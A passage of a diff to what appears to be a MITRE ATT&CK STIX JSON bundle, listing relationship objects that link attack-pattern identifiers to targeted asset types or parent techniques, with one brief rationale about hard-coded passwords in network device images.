"3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88cd9cc4-6721-4456-9f4a-98bb07b59ab1", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88d5cac0-0b3b-4432-b4e5-6f53398d6871", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88e23eda-08b9-4cc6-8ace-976fe98df373", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88edcf36-a6f2-474f-b9c2-7800b34919a2", + "created": "2023-09-28T21:24:07.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:24:07.864Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88f228ef-4e8e-4795-8126-a6dad8c44166", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8909836b-90bd-4c2d-9fc3-8bcc4a37b340", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--891a65fe-e50a-4208-aaf3-c79262397f2b", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--891ea46a-4e20-4d29-b7a6-5b9e702b942b", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--891f67b3-39e8-4948-9c60-27b711d511f9", + "created": "2024-06-26T13:49:59.006Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:49:59.006Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--892426fb-f0f0-4031-aa64-bec7e58d2388", + "created": "2024-06-26T13:44:19.065Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:44:19.065Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8933e64e-6a0d-4cd1-8cab-514424f22410", + "created": "2020-03-14T18:19:53.327Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--89423e8b-a8bb-4658-88f7-70cd6912f61f", + "created": "2020-01-15T18:00:33.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", + "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--894458c5-1356-456d-86b3-3a539b5e674c", + "created": "2024-05-22T17:07:29.221Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T17:07:29.221Z", + "description": "Asset Mapping Rationale: Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. Modify System Image may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.", + "relationship_type": "targets", + "source_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--89477110-1fe1-4396-a58f-7524ccb9f1e7", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8968bf11-5ba9-4012-a277-4a40ed796fbf", + "created": "2020-10-02T16:32:33.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--896ab619-7a85-4111-ae44-da5dae1892fc", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--897cfc36-4253-4e1e-8825-726dbe9088a2", + "created": "2023-09-28T19:55:02.944Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:55:02.944Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--897eb3b9-79ed-428d-ac9b-b6ba105e8de0", + "created": "2024-06-26T15:37:21.439Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:37:21.439Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--899f5d50-95bf-47e6-a95a-cb6e46a4c9bd", + "created": "2021-10-15T19:48:30.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19", + "target_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--89a3764f-0695-4121-9298-fe25d98dffe1", + "created": "2024-02-15T13:45:20.908Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-02-15T13:45:20.908Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a", + "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--89b88239-2368-4241-8ff2-0da095ed545c", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--89d09e89-aded-4194-811b-3da14561e943", + "created": "2020-03-19T19:13:51.095Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--89eab52f-d772-40a2-b7d6-e012be4898db", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a094144-4e1c-4308-9dfb-f789f54c5fda", + "created": "2024-06-27T08:50:46.709Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:50:46.709Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a24ac30-8129-43e9-b38e-8a6bf9cf74d0", + "created": "2024-06-27T09:02:54.337Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:02:54.337Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a253c2c-9a7a-4a8f-a829-9d7e14866ce3", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a2824ff-c5a8-4fdb-9762-02f5aef9c7c0", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a355402-dc7b-441e-9c5c-a09afee104e0", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a432714-eb5a-4ba6-afd1-3fd40ebb5004", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a468c91-7863-4569-8e5f-a71cd565478e", + "created": "2020-01-24T15:05:58.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a480438-0274-443f-9f41-b7dea64b18d2", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a6d66c3-9634-4bf9-bf5d-32121ba6dc3c", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a7111ee-ca63-47c7-bbad-2ce0157a51c4", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a765743-9caf-4c8a-9c58-6fe2c1993108", + "created": "2023-09-29T16:42:43.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:42:43.736Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a7f5604-c768-446c-8e7f-6262345a0b59", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a8c0753-1120-4861-a2b3-b78f4872a9af", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a940c9b-72a5-4e52-b2ff-ea2970934c8b", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8a9d77aa-6954-47a1-898e-cb8458acd171", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ab1985f-5d73-4fe3-a1ca-acb7eb6622f3", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": 